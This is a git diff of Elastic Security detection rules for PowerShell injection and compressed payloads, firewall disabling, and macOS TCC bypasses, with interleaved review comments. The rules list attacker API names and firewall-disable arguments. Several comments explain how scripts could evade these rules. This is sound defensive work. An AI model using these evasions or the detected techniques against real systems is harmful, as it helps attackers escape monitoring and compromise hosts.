>\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -79,5 +92,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json index 79f4f3a85768b..1119611d73deb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json 
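Review bot: The new `setup` string says `Steps to implement the logging policy with with Advanced Audit Configuration:` — beyond the doubled `with`, the path that follows (`Computer Configuration > Administrative Templates > Windows PowerShell`) is a Group Policy administrative-template setting, not an Advanced Audit Policy Configuration entry, so the heading sends readers to the wrong console section; `Steps to implement the logging policy via Group Policy:` describes what the block actually shows. The same sentence appears in the `setup` added to the compressed-payload rule in this change, so the fix belongs in whatever shared template produced it. The text is otherwise carried over unchanged from the old `note`, and the query edit is whitespace only.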
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_compressed.json 
@@ -14,10 +14,23 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the\ndisk. This strategy can circumvent string and file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the\ndisk. 
This strategy can circumvent string and file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. 
As long as the analyst did\nnot identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -72,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json index ced22c139e48b..d21768d85f9fd 100644 
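Review bot: The `setup` string added here repeats `with with Advanced Audit Configuration` before a Group Policy administrative-template path, so it carries the same doubled word and mislabelled section as the sibling PowerShell rule in this change; `Steps to implement the logging policy via Group Policy:` is the accurate heading. Since the text was lifted verbatim from the old `note`, the wording should be corrected at its source rather than rule by rule. One caveat worth a sentence in `setup`: hosts where the policy is not applied never populate `powershell.file.script_block_text`, so the rule is silent there rather than noisy — the step is a hard prerequisite, not a recommendation.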
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_posh_process_injection.json 
@@ -14,15 +14,28 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Process Injection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way,\nlike the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject\npayloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or 
NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n )\n", + "note": "## Triage and analysis\n\n### Investigating Potential Process Injection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPowerShell also has solid capabilities to make the interaction with the Win32 API in an uncomplicated and reliable way,\nlike the execution of inline C# code, PSReflect, Get-ProcAddress, etc.\n\nRed Team tooling and malware developers take advantage of these capabilities to develop stagers and loaders that inject\npayloads directly into the memory without touching the disk to circumvent file-based security protections.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check if the imported function was executed and which process it targeted.\n- Check if the injected code can be retrieved (hardcoded in the script or on command line logs).\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n (VirtualAlloc or VirtualAllocEx or VirtualProtect or LdrLoadDll or LoadLibrary or LoadLibraryA or\n LoadLibraryEx or GetProcAddress or OpenProcess or OpenProcessToken or AdjustTokenPrivileges) and\n (WriteProcessMemory or CreateRemoteThread or NtCreateThreadEx or CreateThread or QueueUserAPC or\n SuspendThread or ResumeThread or GetDelegateForFunctionPointer)\n )\n", "references": [ "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-PSInject.ps1", "https://github.com/EmpireProject/Empire/blob/master/data/module_source/management/Invoke-ReflectivePEInjection.ps1", "https://github.com/BC-SECURITY/Empire/blob/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1" ], + "required_fields": [ + { + 
"ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "high", "tags": [ "Elastic", @@ -62,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json index e370db966e6cc..69fa5b9bd4d70 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_potential_processherpaderping.json 
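Review bot: The new `setup` string carries a typo, "Steps to implement the logging policy with with Advanced Audit Configuration" — drop the duplicated "with" (the same text also went into the compression rule's `setup` in this commit). A second, hedged point on coverage: the kuery needs one API name from each group inside a single `powershell.file.script_block_text` document, and if the platform logs a long script as several 4104 fragments, the two groups may land in different events and the rule will not fire, so the note's false-positive section could say `- Long scripts may be logged as multiple script-block events; the two API groups must appear in the same event for this rule to match.` Since the match is on literal API names, string concatenation or `-join` of the names in the script also evades it, which the note could mention next to the PSReflect cross-reference.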
@@ -16,6 +16,53 @@
 "references": [
 "https://github.com/jxy-s/herpaderping"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "ccc55af4-9882-4c67-87b4-449a7ae8079c",
 "severity": "high",
@@ -44,5 +91,5 @@
 }
 ],
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json
index f9cf7a5e568c2..73438ef48f16d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_powershell_windows_firewall_disabled.json
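Review bot: Nothing to object to in the `required_fields` additions, but the list declares `process.entity_id` and `process.parent.entity_id` as required, and those are only populated by a data source that assigns stable process identities; the rule has no `setup` text saying so, unlike the EQL rules in this commit that document the `event.ingested` fallback. A one-sentence `setup` such as `This sequence rule joins on process.entity_id and process.parent.entity_id; it requires a data source that populates both fields (for example Elastic Defend).` would tell operators why the rule stays silent on a feed that lacks them. The underlying EQL query is outside this hunk.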
@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Firewall Disabled via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile`\nPowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Firewall Disabled via PowerShell\n\nWindows Defender Firewall is a native component that provides host-based, two-way network traffic filtering for a\ndevice and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `Set-NetFirewallProfile`\nPowerShell cmdlet.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Re-enable the firewall with its desired configurations.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name == \"PowerShell.EXE\") and\n process.args : \"*Set-NetFirewallProfile*\" and\n (process.args : \"*-Enabled*\" and process.args : \"*False*\") and\n (process.args : \"*-All*\" or process.args : (\"*Public*\", \"*Domain*\", \"*Private*\"))\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", @@ -23,8 +23,31 @@ "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "http://woshub.com/manage-windows-firewall-powershell/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f63c8e3c-d396-404f-b2ea-0379d3942d73", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
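Review bot: The rewritten `note` keeps the false-positive section but still says nothing about what the rule cannot see, and the `process.args` wildcards it relies on only match when the cmdlet text is literally on the command line; a `.ps1` file, a `-Command` that dot-sources a script, or `-EncodedCommand` will carry `Set-NetFirewallProfile` and `-Enabled False` in the script body rather than in `process.args`. A coverage line in the note, for example `- This rule inspects process arguments only; cmdlets run from a script file or passed via -EncodedCommand are not visible here and need script block logging (event 4104) to detect.`, would stop analysts from treating a non-alert as evidence the firewall was not touched. The `*False*` and `*-Enabled*` terms are also matched independently across arguments, so the note could state that the two tokens are not required to be adjacent.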
@@ -59,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json index 7109a68b805ae..cd1ae060d17c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privacy_controls_tcc_database_modification.json 
@@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privacy Control Bypass via TCCDB Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and \n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"sqlite*\" and\n process.args : \"/*/Application Support/com.apple.TCC/TCC.db\" and\n not process.parent.executable : \"/Library/Bitdefender/AVP/product/bin/*\"\n", "references": [ "https://applehelpwriter.com/2016/08/29/discovering-how-dropbox-hacks-your-mac/", "https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh", "https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "eea82229-b002-470e-a9e1-00be38b14d32", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
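Review bot: The added exclusion `not process.parent.executable : "/Library/Bitdefender/AVP/product/bin/*"` trusts a path prefix alone, so any process whose parent runs from that directory, including something that merely inherits a parent there, skips a high-signal TCC.db check; at the same time the `note` is reduced to an empty string, so the exception is documented nowhere. If your macOS source populates signature data, tighten it to `not (process.parent.executable : "/Library/Bitdefender/AVP/product/bin/*" and process.parent.code_signature.trusted == true)` (confirm the field is present for parent processes on your data before relying on it), and add a line to the note such as `- Bitdefender AVP is excluded because its components legitimately touch TCC.db; review any other sqlite access to this database.` Writing under `/Library` normally needs root, which narrows but does not remove the bypass, so the exception deserves that sentence either way.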
@@ -54,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json index 1cc9aa9f1004a..758f460b5f5a0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_privilege_escalation_privacy_pref_sshd_fulldiskaccess.json 
@@ -11,13 +11,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privacy Control Bypass via Localhost Secure Copy", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and \n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name:\"scp\" and\n process.args:\"StrictHostKeyChecking=no\" and\n process.command_line:(\"scp *localhost:/*\", \"scp *127.0.0.1:/*\") and\n not process.args:\"vagrant@*127.0.0.1*\"\n", "references": [ "https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": 